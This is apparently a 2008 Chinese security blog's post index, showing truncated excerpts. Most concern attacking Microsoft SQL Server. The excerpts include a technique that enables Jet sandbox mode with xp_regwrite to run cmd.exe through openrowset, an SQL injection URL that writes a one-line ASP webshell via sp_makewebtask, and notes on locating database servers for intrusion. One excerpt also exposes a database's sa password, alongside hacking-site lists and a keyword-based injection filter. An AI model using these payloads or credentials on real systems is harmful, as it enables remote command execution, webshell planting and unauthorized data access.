2008-05-21 13:46
sa下删除xp_cmdshell和xplog70.dll时候的一种办法,不算新的了,
也被一些人不断的再次提出来,
为了方便自己记忆再写出来,
在这种情况下,要执行命令,条件是要有xp_regwrite。
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net use |
2008-05-17 22:16
数据库服务器 10.0.5.195
帐户 sa
密码 accountbase
数据库名 gameaccount_server
<%
strSQLServerName = "10.0.5.195" '服务器名称或地址
strSQLDBUserName = "sa" '数据库帐号
strSQLDBPassword = "accountbase" '数据库密码
strSQLDBName = "gameaccount_server" '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQ |
2008-05-17 22:16
用sp_makewebtask直接在web目录里写入一句话马,条件是要sa权限和站点的web路径.
http://127.0.0.1/xxx.asp?id=123';exec%20sp_makewebtask%20'd:\www\xxx\xxx.asp','%20select%20''
<%25execute(request("cn"))%25>''%20';--
select中的双单引号起着重定义的作用 |
2008-05-16 00:18
2008-05-07 17:22
allhack.com
本网站提供了图书馆及下载专区。该图书馆为初学者提供了黑客知识和计算机技术基础知识。下载区包括了扫描工具,FLOOD工具,解密工具,
拒绝服务攻击等。
alw.nih,gov
在安全目录下有大量的安全工具
anticode.com
入侵攻击,拒绝服务攻击,密钥记录器,邮件炸弹,最流行的IRC客户程序脚本,扫描器,嗅探器,口令解密器,木马等程序。此网站更新及时
,而且维护也很好
auscert.org.au
澳大利亚电脑紧急反应小组,包括大量入侵攻击及其工作原理的信息。
astalav |
2008-05-07 17:22
常用国内cms及采集器官方网站索引 ASP: 动易 http://www.powereasy.net/ 风讯 http://www.foosun.cn/ 新云 http://www.newasp.net/ KINCMS http://www.kingcms.net/ 乔客 http://www.joekoe.com/ 渐飞 http://www.jfcms.net/ PHP: DEDECMS http://www.dedecms.com 帝国 http://www.phome.net CMSWARE:http://www.jfcms.net/ PHPCMS:http://www.phpcms.cn/ 宏博CMS http://www.hbcms.com/ 采集器:火车头 http://www.locoy.com/ 小蜜蜂 http://bc.downreg.com/bc/index.html 三人行(论坛采集)http://www.cnsrx.cn/ 守望采集器 http: |
2008-05-07 17:21
早在1999年9月的时候,Brett Tabke在Webmaster World论坛写过一篇《26步达到一天15000》。现在已有很多不同,该考虑一个新的“26步计划”献给2006年的站长们了。一些旧的技巧仍然适用(比如,每天写出新内容),但一些已经不再适用(向搜索引擎提交已经不是必要步骤),我们这次就要告诉你什么该做什么不必做。你可能已经了解,要带来流量不是那么容易——要辛苦的劳动、抉择,是件体力活。所以,如果你已经准备好,那就卷起袖子,照着这简单的26步,一年之内,你会得到足够的流量,让你忙到不停歇。
|
2008-05-07 17:19
其实.即使数据库和WEB不在一块还是有机会搞的.并不是说一点机会没.一般服务器装好系统什么的.都会装个IIS吧?列他C盘.看看有没有Inetpub这个目录.就知道他有没有装IIS了.但是.不知道他IP也?怎么办呢?可以这样来,PING一下WEB服务器.扫他这一C段的1433端口.看看哪台开了.不过这方法也不好.现在很多主机都启用了防火墙.1433端口就算开了你也扫不着.这该怎么办呢?可以利用opendatasource宏让对方的SQL与自己的数据库建立连接.既然能建立连接.就可以得到数据库服务器的IP地址了.我们来试试看.有几个前提得说一下.第一.你机器必须 |
2008-05-07 17:15
MEMBER_NAME: KJ021320/NONAMED
INTRODUCE: 对各项IT技术都有颇钻究,特别对计算机安全方面更情有独钟,对C++,以及脚本技术ASP PHP PERL PYTHON
非常熟悉,开发出各项安全测试工具,后来转向中间语言.NET J2EE领域,现从事BI商业智能企业构架,对数据仓库设计与
数据挖掘技术有深入的研究
SPECIALTY: DataMining
E-MAIL: kj021320@126.com
QQ: 282720807
BLOG: http://blog.csdn.net/kj021320/
--------- |
2008-05-07 17:09
<%
StrTemp=request.servervariables("server_name")&request.servervariables("url")&"?"&Request.QueryString
StrTemp = LCase(StrTemp)
If Instr(StrTemp,"select%20") or Instr(StrTemp,"insert%20") or Instr(StrTemp,"delete%20from") or Instr(StrTemp,"count(") or |
|
|
|